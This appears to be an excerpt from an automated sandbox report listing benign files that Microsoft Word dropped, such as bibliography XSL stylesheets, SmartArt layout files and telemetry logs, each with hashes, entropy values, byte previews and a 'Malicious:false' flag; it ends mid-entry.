                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..05/08/2024 23:48:15.346.WINWORD (0x1D98).0x1D9C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":28,"Time":"2024-05-08T23:48:15.346Z","Contract":"Office.System.Activity","Activity.CV":"uSQfNQq6B0+NPPAr9gvxOQ.1.13","Activity.Duration":13,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...05/08/2024 23:48:15.362.WINWORD (0x1D98).0x1D9C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":30,"Time":"2024-05-08T23:48:15.362Z","Contract":"Office.System.Activity","Activity.CV":"uSQfNQq6B0+NPPAr9gvxOQ.1.14","Activity.Duration":11538,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersio
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):260
                            Entropy (8bit):3.4895685222798054
                            Encrypted:false
                            SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                            MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                            SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                            SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                            SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):3075
                            Entropy (8bit):7.716021191059687
                            Encrypted:false
                            SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                            MD5:67766FF48AF205B771B53AA2FA82B4F4
                            SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                            SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                            SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                            Malicious:false
                            Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):332
                            Entropy (8bit):3.547857457374301
                            Encrypted:false
                            SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                            MD5:4EC6724CBBA516CF202A6BD17226D02C
                            SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                            SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                            SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):284415
                            Entropy (8bit):5.00549404077789
                            Encrypted:false
                            SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                            MD5:33A829B4893044E1851725F4DAF20271
                            SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                            SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                            SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):278
                            Entropy (8bit):3.5280239200222887
                            Encrypted:false
                            SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                            MD5:877A8A960B2140E3A0A2752550959DB9
                            SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                            SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                            SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):268317
                            Entropy (8bit):5.05419861997223
                            Encrypted:false
                            SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                            MD5:51D32EE5BC7AB811041F799652D26E04
                            SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                            SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                            SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):333258
                            Entropy (8bit):4.654450340871081
                            Encrypted:false
                            SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                            MD5:5632C4A81D2193986ACD29EADF1A2177
                            SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                            SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                            SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):328
                            Entropy (8bit):3.541819892045459
                            Encrypted:false
                            SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                            MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                            SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                            SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                            SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):3.5502940710609354
                            Encrypted:false
                            SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                            MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                            SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                            SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                            SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):270198
                            Entropy (8bit):5.073814698282113
                            Encrypted:false
                            SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                            MD5:FF0E07EFF1333CDF9FC2523D323DD654
                            SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                            SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                            SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):260
                            Entropy (8bit):3.494357416502254
                            Encrypted:false
                            SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                            MD5:6F8FE7B05855C203F6DEC5C31885DD08
                            SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                            SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                            SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):6193
                            Entropy (8bit):7.855499268199703
                            Encrypted:false
                            SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                            MD5:031C246FFE0E2B623BBBD231E414E0D2
                            SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                            SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                            SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                            Malicious:false
                            Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):256
                            Entropy (8bit):3.464918006641019
                            Encrypted:false
                            SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                            MD5:93149E194021B37162FD86684ED22401
                            SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                            SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                            SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):51826
                            Entropy (8bit):5.541375256745271
                            Encrypted:false
                            SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                            MD5:2AB22AC99ACFA8A82742E774323C0DBD
                            SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                            SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                            SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                            Malicious:false
                            Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):242
                            Entropy (8bit):3.4938093034530917
                            Encrypted:false
                            SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                            MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                            SHA1:BA15D036D522978409846EA682A1D7778381266F
                            SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                            SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):4888
                            Entropy (8bit):7.8636569313247335
                            Encrypted:false
                            SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                            MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                            SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                            SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                            SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                            Malicious:false
                            Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):4026
                            Entropy (8bit):7.809492693601857
                            Encrypted:false
                            SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                            MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                            SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                            SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                            SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                            Malicious:false
                            Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):250
                            Entropy (8bit):3.4916022431157345
                            Encrypted:false
                            SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                            MD5:1A314B08BB9194A41E3794EF54017811
                            SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
